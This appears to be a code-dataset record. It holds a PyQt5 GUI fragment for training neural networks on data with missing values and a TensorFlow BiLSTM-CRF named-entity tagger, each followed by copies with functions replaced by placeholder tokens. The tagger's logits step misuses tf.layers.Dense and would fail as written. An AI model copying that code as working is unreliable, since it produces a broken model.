labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n 
label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n 
trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n 
return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<code token>\n", "<import token>\n<class token>\n<code token>\n" ]
false
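The save and load handlers in the record above all follow one PyQt5 dialog pattern: QFileDialog.getSaveFileName or getOpenFileName picks a path, the model object serializes itself to JSON, and QMessageBox.information reports the outcome. Below is a minimal standalone sketch of that pattern, assuming PyQt5 is installed; the ModelIODemo class, the model dict, and the *.cbcnn.json filter are illustrative stand-ins, not parts of the record. One detail worth knowing: these dialog statics return a (filename, selected_filter) pair, both empty strings when the user cancels, which is why the record's truthiness test on the second return value (its "ok" variable) behaves like a cancel check.

import json
import sys

from PyQt5.QtWidgets import (QApplication, QFileDialog, QMessageBox,
                             QPushButton, QVBoxLayout, QWidget)


class ModelIODemo(QWidget):
    """Minimal sketch of the save/load dialog pattern used above."""

    def __init__(self):
        super().__init__()
        self.model = {'layers': 2, 'hidden': 128}  # illustrative stand-in
        save_btn = QPushButton('Save Model')
        load_btn = QPushButton('Load Model')
        save_btn.clicked.connect(self.save_model)
        load_btn.clicked.connect(self.load_model)
        layout = QVBoxLayout(self)
        layout.addWidget(save_btn)
        layout.addWidget(load_btn)

    def save_model(self):
        # Returns (path, selected_filter); both are '' if the dialog is cancelled.
        fname, _filter = QFileDialog.getSaveFileName(
            self, 'Save Model', 'model.cbcnn.json',
            'Combine-CNN json files (*.cbcnn.json)')
        if not fname:
            return
        try:
            with open(fname, 'w') as fh:
                json.dump(self.model, fh)
            QMessageBox.information(self, 'Save result', 'Model saved.')
        except OSError:
            QMessageBox.information(self, 'Save result', 'Model save failed.')

    def load_model(self):
        fname, _filter = QFileDialog.getOpenFileName(
            self, 'Load Model', '.', 'Combine-CNN json files (*.cbcnn.json)')
        if not fname:
            return
        try:
            with open(fname) as fh:
                self.model = json.load(fh)
            QMessageBox.information(self, 'Load result', 'Model loaded.')
        except (OSError, json.JSONDecodeError):
            QMessageBox.information(self, 'Load result', 'Model load failed.')


if __name__ == '__main__':
    app = QApplication(sys.argv)
    demo = ModelIODemo()
    demo.show()
    sys.exit(app.exec_())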
10
5d9c8e235385ff53c7510994826ff3a04e4a5888
""" @file : 001-rnn+lstm+crf.py @author: xiaolu @time : 2019-09-06 """ import re import numpy as np import tensorflow as tf from sklearn.metrics import classification_report class Model: def __init__(self, dim_word, dim_char, dropout, learning_rate, hidden_size_char, hidden_size_word, num_layers): ''' :param dim_word: 词的维度 :param dim_char: 字符维度 :param dropout: dropout :param learning_rate: 学习率 :param hidden_size_char: 字符隐层输出维度 :param hidden_size_word: 词隐层输出维度 :param num_layers: 几层 ''' def cells(size, reuse=False): return tf.contrib.rnn.DropoutWrapper( tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse), output_keep_prob=dropout ) # 1. define input self.word_ids = tf.placeholder(tf.int32, shape=[None, None]) self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None]) self.labels = tf.placeholder(tf.int32, shape=[None, None]) self.maxlen = tf.shape(self.word_ids)[1] self.lengths = tf.count_nonzero(self.word_ids, 1) # 2. embedding self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word))) self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char))) word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids) char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids) s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size) char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char]) for n in range(num_layers): (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn( cell_fw=cells(hidden_size_char), cell_bw=cells(hidden_size_char), inputs=char_embedded, dtype=tf.float32, scope='bidirectional_rnn_char_%d' % n ) char_embedded = tf.concat((out_fw, out_bw), 2) output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char]) word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接 for n in range(num_layers): (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn( cell_fw=cells(hidden_size_word), cell_bw=cells(hidden_size_word), inputs=word_embedded, dtype=tf.float32, scope='bidirectional_rnn_word_%d' % n ) word_embedded = tf.concat((out_fw, out_bw), 2) logits = tf.layers.Dense(word_embedded, len(idx2tag)) y_t = self.labels log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood( logits, y_t, self.lengths ) self.cost = tf.reduce_mean(-log_likelihood) self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost) mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen) self.tags_seq, tags_score = tf.contrib.crf.crf_decode( logits, transition_params, self.lengths ) self.tags_seq = tf.identity(self.tags_seq, name='logits') y_t = tf.cast(y_t, tf.int32) self.prediction = tf.boolean_mask(self.tags_seq, mask) mask_label = tf.boolean_mask(y_t, mask) correct_pred = tf.equal(self.prediction, mask_label) correct_index = tf.cast(correct_pred, tf.float32) self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) def parse(file): ''' 加载文件并且解析 :param file: 文件名 :return: 词<->词性 ''' with open(file) as fopen: texts = fopen.read().split('\n') left, right = [], [] for text in texts: if '-DOCSTART' in text or not len(text): continue splitted = text.split() left.append(splitted[0]) right.append(splitted[-1]) return left, right def process_string(string): ''' :param string: :return: ''' string= re.sub('[^A-Za-z0-9\-\/ ]+', ' ', string).split() return ' '.join([to_title(y.strip()) for y in 
string]) def to_title(string): if string.isupper(): string = string.title() return string def parse_XY(texts, labels): ''' 整理词性表  词表  字符表  并将文本转为对应的数字序列 :param texts: 文本 词的一个列表 :param labels: 词性的一个列表 :return: 词转为id的序列 词性转为id的序列 ''' global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx X, Y = [], [] for no, text in enumerate(texts): text = text.lower() # 当前这个单词转小写 tag = labels[no] # 取出对应的词性 for c in text: # 字符表 if c not in char2idx: char2idx[c] = char_idx char_idx += 1 if tag not in tag2idx: # 词性表 tag2idx[tag] = tag_idx tag_idx += 1 Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值 if text not in word2idx: # 词表 word2idx[text] = word_idx word_idx += 1 X.append(word2idx[text]) # 将词转为id的标号 return X, np.array(Y) def iter_seq(x): return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)]) def to_train_seq(*args): ''' :param args: 词转为的id的序列   词性转为id的序列 :return: ''' return [iter_seq(x) for x in args] def generate_char_seq(batch): ''' 传进来是50一个块 总共有多少块 然后将每块的单词转为字符序列 :param batch: :return: ''' x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度 maxlen = max([j for i in x for j in i]) # 最大长度 temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32) for i in range(batch.shape[0]): for k in range(batch.shape[1]): for no, c in enumerate(idx2word[batch[i, k]]): temp[i, k, -1-no] = char2idx[c] return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)] def pred2label(pred): # 将预测结果转为标签 out = [] for pred_i in pred: out_i = [] for p in pred_i: out_i.append(idx2tag[p]) out.append(out_i) return out if __name__ == '__main__': left_train, right_train = parse('./data/eng.train') left_test, right_test = parse('./data/eng.testa') # print(left_train[:10]) # print(right_train[:10]) word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表 tag2idx = {'PAD': 0} # 词性表 char2idx = {'PAD': 0} word_idx = 3 tag_idx = 1 char_idx = 1 train_X, train_Y = parse_XY(left_train, right_train) test_X, test_Y = parse_XY(left_test, right_test) # print(train_X[:20]) # print(train_Y[:20]) idx2word = {idx: tag for tag, idx in word2idx.items()} idx2tag = {i: w for w, i in tag2idx.items()} seq_len = 50 X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落 X_char_seq = generate_char_seq(X_seq) print(X_seq.shape) # (203571, 50) print(X_char_seq.shape) # (203571, 50, 61) X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y) X_char_seq_test = generate_char_seq(X_seq_test) print(X_seq_test.shape) # (51312, 50) print(X_char_seq_test.shape) # (51312, 50, 27) train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test tf.reset_default_graph() sess = tf.Session() dim_word = 64 dim_char = 128 dropout = 0.8 learning_rate = 1e-3 hidden_size_char = 128 hidden_size_word = 128 num_layers = 2 batch_size = 32 model = Model(dim_word, dim_char, dropout, learning_rate, hidden_size_char, hidden_size_word, num_layers) sess.run(tf.global_variables_initializer()) for e in range(3): train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0 for i in range(0, len(train_X), batch_size): batch_x = train_X[i: min(i + batch_size, train_X.shape[0])] batch_char = train_char[i: min(i + batch_size, train_X.shape[0])] batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])] acc, cost, _ = sess.run( [model.accuracy, model.cost, model.optimizer], feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, model.labels: batch_y }, ) train_loss += cost train_acc += acc print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc)) for i in range(0, 
len(test_X), batch_size): batch_x = test_X[i: min(i + batch_size, test_X.shape[0])] batch_char = test_char[i: min(i + batch_size, test_X.shape[0])] batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])] acc, cost = sess.run( [model.accuracy, model.cost], feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, model.labels: batch_y }, ) test_loss += cost test_acc += acc print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc)) train_loss /= len(train_X) / batch_size train_acc /= len(train_X) / batch_size test_loss /= len(test_X) / batch_size test_acc /= len(test_X) / batch_size print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n' % (e, train_loss, train_acc, test_loss, test_acc)) real_Y, predict_Y = [], [] for i in range(0, len(test_X), batch_size): batch_x = test_X[i: min(i + batch_size, test_X.shape[0])] batch_char = test_char[i: min(i + batch_size, test_X.shape[0])] batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])] predicted = pred2label( sess.run(model.tags_seq, feed_dict={ model.word_ids: batch_x, model.char_ids: batch_char, }, ) ) real = pred2label(batch_y) predict_Y.extend(predicted) real_Y.extend(real) print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))
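One step in the code above deserves a flag: logits = tf.layers.Dense(word_embedded, len(idx2tag)) constructs a Dense layer object, passing a tensor where the integer units argument belongs, so crf_log_likelihood receives a layer object rather than a [batch, time, num_tags] score tensor. In TF 1.x the projection presumably intended is the functional tf.layers.dense(inputs, units), or equivalently tf.layers.Dense(units) applied to the tensor. A minimal sketch of the corrected projection follows, assuming TF 1.x-style APIs via tf.compat.v1; the embedding width and tag count are illustrative values, not taken from the record.

import numpy as np
import tensorflow.compat.v1 as tf  # assumes TF 1.x-style APIs are available

tf.disable_v2_behavior()

num_tags = 5  # stand-in for len(idx2tag)
word_embedded = tf.placeholder(tf.float32, shape=[None, None, 256])

# Functional form: applies a [256 -> num_tags] projection and returns a tensor.
logits = tf.layers.dense(word_embedded, num_tags)
# Equivalent class form: build Dense(units) first, then call it on the tensor:
# logits = tf.layers.Dense(num_tags)(word_embedded)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    out = sess.run(logits, {word_embedded: np.zeros((2, 50, 256), np.float32)})
    print(out.shape)  # (2, 50, 5) -- per-token tag scores fed to the CRF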
[ "\"\"\"\n\n@file : 001-rnn+lstm+crf.py\n\n@author: xiaolu\n\n@time : 2019-09-06\n\n\"\"\"\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n '''\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n '''\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(\n tf.nn.rnn_cell.LSTMCell(size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout\n )\n\n # 1. define input\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n\n # 2. embedding\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.char_ids)\n\n s = tf.shape(char_embedded) # (51312, 50, 27, embedding_size)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2], dim_char])\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_char),\n cell_bw=cells(hidden_size_char),\n inputs=char_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_char_%d' % n\n )\n char_embedded = tf.concat((out_fw, out_bw), 2)\n\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2*hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1) # 将词嵌入部分与字符嵌入通过双向lstm输出部分进行拼接\n\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw) = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=cells(hidden_size_word),\n cell_bw=cells(hidden_size_word),\n inputs=word_embedded,\n dtype=tf.float32,\n scope='bidirectional_rnn_word_%d' % n\n )\n word_embedded = tf.concat((out_fw, out_bw), 2)\n\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths\n )\n\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(\n logits, transition_params, self.lengths\n )\n\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n\n y_t = tf.cast(y_t, tf.int32)\n\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n '''\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n '''\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n 
left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n '''\n :param string:\n :return:\n '''\n string= re.sub('[^A-Za-z0-9\\-\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n '''\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n '''\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower() # 当前这个单词转小写\n tag = labels[no] # 取出对应的词性\n for c in text: # 字符表\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx: # 词性表\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag]) # 当前这个词的词性转为id的值\n if text not in word2idx: # 词表\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text]) # 将词转为id的标号\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i: i+seq_len] for i in range(0, len(x)-seq_len, 1)])\n\n\ndef to_train_seq(*args):\n '''\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n '''\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n '''\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n '''\n x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度\n maxlen = max([j for i in x for j in i]) # 最大长度\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1-no] = char2idx[c]\n return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)]\n\n\ndef pred2label(pred):\n # 将预测结果转为标签\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n # print(left_train[:10])\n # print(right_train[:10])\n\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表\n tag2idx = {'PAD': 0} # 词性表\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n # print(train_X[:20])\n # print(train_Y[:20])\n\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n\n seq_len = 50\n\n X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape) # (203571, 50)\n print(X_char_seq.shape) # (203571, 50, 61)\n\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape) # (51312, 50)\n print(X_char_seq_test.shape) # (51312, 50, 27)\n\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n\n tf.reset_default_graph()\n sess = tf.Session()\n\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 1e-3\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), 
